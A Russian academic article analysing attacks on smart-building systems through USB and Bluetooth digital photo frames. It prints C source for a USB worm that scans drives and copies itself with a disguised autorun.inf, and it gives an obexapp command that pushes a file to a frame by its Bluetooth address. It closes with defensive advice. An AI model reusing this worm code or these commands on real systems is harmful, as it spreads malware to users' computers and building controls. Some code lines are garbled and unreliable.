Научная статья на тему 'Атаки на системы автоматизированного управления зданиями с использованием цифровых носителей'

Атаки на системы автоматизированного управления зданиями с использованием цифровых носителей Текст научной статьи по специальности «Компьютерные и информационные науки»

CC BY
365
77
i Надоели баннеры? Вы всегда можете отключить рекламу.
Ключевые слова
USB ФЛЕШ-КАРТА / АДРЕС BLUETOOTH-УСТРОЙСТВА / PIN-КОД / ПРОТОКОЛ ПЕРЕДАЧИ ДАННЫХ OBEX / BLUETOOTH / USB FLESH CARD / BLUETOOTH DEVICE ADDRESS / PIN-CODE / DATA TRANSMISSION PROTOCOL OBEX

Аннотация научной статьи по компьютерным и информационным наукам, автор научной работы — Бельтов Андрей Георгиевич, Новицкий Анатолий Викторович, Проничкин Алексей Сергеевич, Крымов Антон Сергеевич

Данная статья посвящена исследованию возможностей осуществления атаки на системы автоматизации умного дома с использованием цифровых носителей, например, фоторамок. Злоумышленник может воспользоваться уязвимостями как обычных USB-рамок, так и рамок с поддержкой технологии передачи данных Bluetooth. С их помощью мошенник может менять информацию, которая воспроизводится рамкой, а также заразить систему автоматизированного управления зданием вредоносным программным обеспечением.

i Надоели баннеры? Вы всегда можете отключить рекламу.

Похожие темы научных работ по компьютерным и информационным наукам , автор научной работы — Бельтов Андрей Георгиевич, Новицкий Анатолий Викторович, Проничкин Алексей Сергеевич, Крымов Антон Сергеевич

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.
i Надоели баннеры? Вы всегда можете отключить рекламу.

Bluetooth, USB flesh card, Bluetooth device address, PIN-code, data transmission protocol OBEX Bluetooth, USB flesh card, Bluetooth device address, PIN-code, data transmission protocol OBEXThis article is devoted to analysis of attacks on automated systems of digital house performed with vulnerabilities of digital carrier such as photo frames. An intruder may exploit the weaknesses of ordinary USB-frames as well as frames supporting Bluetooth technology. The attacker can change the information that is displayed by the digital frame and even infect the digital home with malware.

Текст научной работы на тему «Атаки на системы автоматизированного управления зданиями с использованием цифровых носителей»

БЕЛЬТОВ1 Андрей Георгиевич, кандидат технических наук, доцент НОВИЦКИЙ2 Анатолий Викторович ПРОНИЧКИН3 Алексей Сергеевич КРЫМОВ4 Антон Сергеевич

АТАКИ НА СИСТЕМЫ АВТОМАТИЗИРОВАННОГО УПРАВЛЕНИЯ ЗДАНИЯМИ С ИСПОЛЬЗОВАНИЕМ ЦИФРОВЫХ НОСИТЕЛЕЙ

Данная статья, посвящена исследованию возможностей осуществления атаки на системы, автоматизации, умного дома с использованием, цифровых носителей, например, фоторамок. Злоумышленник может, воспользоваться, уязвимостями как обычных USB-рамок, так и. рамок с поддержкой технологии передачи данных Bluetooth. С их помощью мошенник может, менять информацию, которая, воспроизводится, рамкой, а также заразить систему автоматизированного управления, зданием, вредоносным, программным, обеспечением..

Ключевые слова: Bluetooth, USB флеш-карта, адрес Bluetooth-устройства, PIN-код, протокол передачи данных OBEX.

This article is devoted to analysis of attacks on automated, systems of digital house performed, with vulnerabilities of digital carrier such as photo frames. An intruder may exploit the weaknesses of ordinary USB-frames as well as frames supporting Bluetooth technology. The attacker can change the information that is displayed, by the digital frame and. even infect the digital home with malware. Keywords: Bluetooth, USB flesh card, Bluetooth device address, PIN-code, data transmission protocol OBEX.

Фоторамка — это компактная жидкокристаллическая панель, предназначенная для воспроизведения изображений, записанных в цифровом виде. Многие фоторамки можно использовать как органайзеры, которые показывают не только фотографии, но и календарь, отмечая важные даты. Более того, постоянно увеличивается диагональ рамок, появляются дистанционные пульты управления, встраивается Bluetooth для беспроводной передачи изображений. Пренебрежительное отношение к безопасности подобных устройств может привести к их уязвимости. Существует два типовых сценария реализации атаки с использованием цифровых носителей, например, фотокамки. Если злоумышленник ставит своей целью запугать жертву, он может воспользоваться наличием фоторамки с поддержкой Bluetooth и удаленно, без контакта с рамкой, передать на нее неприятную для жертвы информацию. Если же рамка является стандартной, с USB-интерфейсом, то злоумышленнику необходимо сначала заразить носитель, с помощью которого передается информация на внутреннюю память рамки.

Если же цель злоумышленника — воспользоваться уязвимостью фоторамки и передать через нее вирус на систему

умного дома, то возможно удаленно заразить фоторамку с поддержкой Bluetooth для того, чтобы потом, при синхронизации с системой дома, вирус заразил центральный сервер управления автоматизированным зданием. В любом случае, злоумышленник будет вынужден воспользоваться одной из двух техник: использовать скрытый вирус, автоматически распространяющийся при подключении по USB флеш-карты к фоторамке, или использовать уязвимости протокола Bluetooth для внедрения вируса. Рассмотрим, как функционирует вирус, заражающий рамку при подключении по USB-интерфейсу. Обычно подобный вирус является скрытым исполняемым файлом, то есть данный файл не виден для пользователя. Главная задача злоумышленника — заразить USB-флешку, которую впоследствии подсоединяют к фоторамке. Обычно для этого заражают компьютер, с которого пользователь копирует фотографии для того, чтобы потом переместить их на фоторамку. Существует множество способов заражения компьютера вредоносным программным обеспечением [1, 2].

Мошеннику необходимо передать скрытый файл на компьютер. При попадании на устройство вирусный файл

' — ФГУП «ЦНИИ ЭИСУ», генеральный директор;2 — директор центра ФГУП «ЦНИИ ЭИСУ»;

3 - НИЯУ «МИФИ», студент;4 - НИЯУ «МИФИ», аспирант.

автоматически запускается, после чего копируется в системную папку и прописывается в автозапуск системы. После этого вирус раз в 20 секунд производит поиск всех дисков, подключенных к компьютеру (в том числе и Flash-USB-накопителей). Если обнаруженный диск доступен для записи, то вирус копируется на него вместе с файлом конфигурации автозапуска себя самого «autorun.inf» и каким-то вредоносным контентом. В нашем случае это картинка с названием «virus.jpg»

Ниже приведены части вирусного кода, написанного под операционную систему Windows.

Вредоносное программное обеспечение обладает следующими основными функциональными возможностями:

♦ поиск дисков для заражения;

♦ копирование вируса на носитель;

♦ реализация автоматического запуска вируса при подключении диска.

Обычно, заразив систему, вирус с прилагающимися файлами копируется в папку «C:\WINDOWS\system» и создает ключ реестра для автозапуска вируса в системе. Приведем пример стандартной функции поиска носителей для операционной системы семейства Windows:

void scandrives()

{

DWORD dwMask = 1;

DWORD dwDrives = GetLogicalDrives ();

char strDrive[4] = {'\0'};

for (int i=0; i < 26; i++ )

{

//Logically 'AND' the Bitmask with 0x1. we get zero, if it's a drive

if (dwDrives & dwMask)

{

wsprintfA ((LPSTR)strDrive, "%c:", 'A'+i);

if(strcmp(strDrive,"C:"))

{

jump(strDrive);

}

for(int j = 0; j < 4; j++) strDrive[j] = '\0';

}

dwMask <<= 1;

} }

Центральный цикл системы перебирает значения от 0 до 26 по количеству букв в латинском алфавите. Эти буквы используются для обозначения системных дисков. Например, диск C:, диск D: и так далее. Перевод из численного значения в буквенное производится в функции wsprintfA ((LPSTR)strDrive, "%c:", 'A'+i). В следующей строке выполняется проверка того, что выбранный диск не является диском C: — этот диск заражать бессмысленно, так как вирус, изначально заразивший систему, прописывается как раз на диске C.

Функция jump(strDrive) реализует копирование на носитель вирусных файлов:

void jump(char* drive)

{

char fDest[MAX_PATH];

char aFile[MAX_PATH],pFile[MAX_PATH];

strcpy(fDest,drive);

strcpy(aFile,drive);

strcpy(pFile,drive);

strcat(fDest,"\\test.exe");

strcat(aFile,"\\autorun.inf");

strcat(pFile,"\\preved.jpg");

wchar_t wdrive[MAX_PATH];

mbstowcs(wdrive,drive,MAX_PATH);

if(GetVolumeInformation(wdrive(NULL,NULL(NULL,NULL,

NULL,NULL,NULL) != 0)

{

mbstowcs(wdrive,fDest,MAX_PATH);

CopyFileEx(L"C:\\WINDOWS\\system\\test.exe",

wdrive,NULL,NULL,FALSE,NULL);

mbstowcs(wdrive,aFile,MAX_PATH);

CopyFile(L"C:\\WINDOWS\\system\\autorun.

inf",wdrive,FALSE);

mbstowcs(wdrive,pFile,MAX_PATH);

CopyFile(L"C:\\WINDOWS\\system\\virus.

jpg",wdrive,FALSE);

}

}

В данной функции проверяется доступность носителя. Например, CD-ROM без диска может вызвать ошибку при попытке доступа. Если носитель доступен, осуществляется его заражение. Выполняется копирование трех файлов, как следует из функции: test.exe, autorun.inf и virus.jpg. Первый файл — это исполняемый вирус. Файл virus.jpg, как уже было сказано, содержит контент, который призван запугать владельца рамки при запуске. Содержание файла autorun. inf приведено ниже.

[autorun] open=test.exe

icon=%SystemRoot%\system32\SHELL32.dll,4 action=Open folder to view files shell\open=Open shell\open\command=test.exe

Этот файл копируется вместе программой. При стандартном автозапуске для носителей в системе в меню выбора действия первым пунктом появляется запуск вируса, который внешне похож на «открытие для просмотра». В случае фоторамки автоматически будет выполнен вирус, копирующий первым делом вредоносное содержимое. Теперь обратимся ко второму примеру — заражение фоторамки по беспроводному каналу передачи данных Bluetooth. Первым препятствием для злоумышленника, реализующего данный сценарий, является удаленное обнаружение фоторамки в здании. Для этого необходимо просканировать периметр здания. При этом Bluetooth-передатчик фоторамки, как правило, функционирует в скрытом режиме, то есть

обратиться к рамке, не зная ее адреса, не представляется возможным, ведь этот адрес не транслируется в окружающее пространство.

Адрес Bluetooth устройства — это уникальный идентификатор длиной 6 байт. Первые три байта адреса представляют собой идентификатор производителя устройства. Последние три байта определяются согласно правилам производителя.

Например, шестнадцатеричное представление адреса Bluetooth для фоторамки Samsung 700Z выглядит следующим образом: 01:0B:C9:AB:88:C7.

Первые три байта 01:0B:C9 — это идентификатор производителя Samsung. Эти три байта повторяются для всех устройств данной компании. Байт AB указывает на то, что это именно 700Z. Последние два байта (88:C7) характеризуют конкретную модель рамки 700Z.

Подобные таблицы имеются в открытом доступе для всех производителей и устройств. Таким образом, злоумышленнику будет несложно определить, какое из устройств в доме — фоторамка. Отметим, что в настоящее время в открытой продаже есть антенны Bluetooth, способные взаимодействовать на расстояниях до 100 метров. То есть, мошенник сможет просканировать весь периметр дома или коттеджа, находясь на значительно расстоянии.

После того, как фоторамка обнаружена и идентифицирована, остается передать на нее файл с вирусным содержанием. Для этого злоумышленник может воспользоваться «слабыми местами» технологии Bluetooth [3]. Атака основана на уязвимости процедуры разрешения доступа для передачи и приема файлов у ряда фоторамок с поддержкой Bluetooth. Во-первых, злоумышленнику не представляет труда обойти встроенную защиту Bluetooth, построенную на использовании PIN-кода. Производители фоторамок устанавливают PIN-код на заводе, не оставляя пользователям возможности его менять. У фоторамки для этого просто нет соответствующего интерфейса в виде клавиатуры. Более того, по ошибочному мнению большинства разработчиков, злоумышленнику вряд ли придет в голову взламывать фоторамки. Но мошеннику не представляет труда найти опубликованный список таких PIN-кодов. В конце концов, злоумышленник может просто купить подобную фоторамку и узнать ее PIN-код. После того как злоумышленнику известен PIN-код

и адрес, он может воспользоваться простым ноутбуком с Bluetooth-передатчиком. Ноутбук, как правило, работает под управлением операционной системы семейства UNIX с поддержкой модуля Bluetooth и протокола передачи данных OBEX.

Протокол OBEX (Objed; Exchange Protocol) создан для обмена объектами между двумя устройствами Bluetooth. OBEX обеспечивает функциональность, сходную с НТТР, и поддерживает клиент-серверную модель.

Клиент OBEX используется для отправки или приема объектов с сервера OBEX. Сервер OBEX развертывается на ряде уязвимых Bluetooth-фоторамок. Обмен между сервером одного устройства и клиентом другого происходит с помощью достаточно простого протокола. Базовыми командами протокола являются PUT и GET. Злоумышленник может выполнить PUT-запрос для того, чтобы передать файл с нежелательным содержимым на фоторамку [4, 5]. Ниже приводится пример запроса консольной команды с ноутбука злоумышленника на передачу вируса на фоторамку:

# obexapp -C OBEx -a 01:0B:C9:AB:88:C7 -n put / virus.jpg

Передаваться может как изображение неприятного содержания, так и USB-вирус. Если подобный USB-вирус попадет на фоторамку, то велика вероятность заражения при очередном подключении USB-накопителя к персональному компьютеру. Следовательно, повышается опасность того, что будет заражена система умного дома, если проектировщики системы не разделили пользовательский компьютер и систему автоматизированного управления зданием. Для того чтобы защититься от атаки на систему умного дома, необходимо помнить о том, что технологии, используемые в современных фоторамках, уязвимы. Чтобы обезопасить себя, следует соблюдать простейшие правила компьютерной гигиены при использовании USB-носителей, с которых переносятся данные на фоторамки. Необходимо проверять флеш-карты на наличие вирусов с помощью антивирусных средств. Кроме того, важно быть крайне бдительным, если фоторамка имеет возможность работы по Bluetooth-протоколу, так как злоумышленник может скрыто записать на нее вирус. Также следует из множества фоторамок с поддержкой Bluetooth выбрать ту, которая позволяет менять PIN-код устройства

Литература

1. Конев В.Н., Фроимсон М.И., Михайлов Д.М., Евсеев В.Л. Вирусные атаки на современные мобильные платформы.. /Безопасность информационных технологий. — Безопасность мобильной связи, 2012. — 2БМС. — С. 65 — 72.

2. Михайлов Д.М., Жуков И.Ю. Под редакцией Ивашко А.М. Защита мобильных телефонов от. атак. — М.: Фойлис, 2011. — 192 с.: ил.

3. Пихтулов А.А., Шевченко Д.В., Холявин В.Б. Анализ и классификация, угроз для. мобильных устройств, использующих уязвимости технологии Bluetooth. /Безопасность информационных технологий. — Безопасность мобильной связи, 2012. — 2БМС. - С. 36 - 43.

4. Пихтулов А.А., Михайлов Д.М. Обзор Bluetooth-атак на мобильные устройства с использованием, уязвимостей протокола OBEX. /Сборник материалов IX Международной научно-практической конференции «Наука и современность 2011», Новосисбирск, 2011. - С. 258, 43.

5. Бельтов А.Г., Жуков И.Ю., Новицкий А.В., Михайлов Д.М., Стариковский А.В. Неавторизованное похищение данных с Bluetooth-устройств с использованием, уязвимостей OBEX-протокола. /Безопасность информационных технологий. — Безопасность мобильной связи, 2012. — 2БМС. — С. 54 — 56.

i Надоели баннеры? Вы всегда можете отключить рекламу.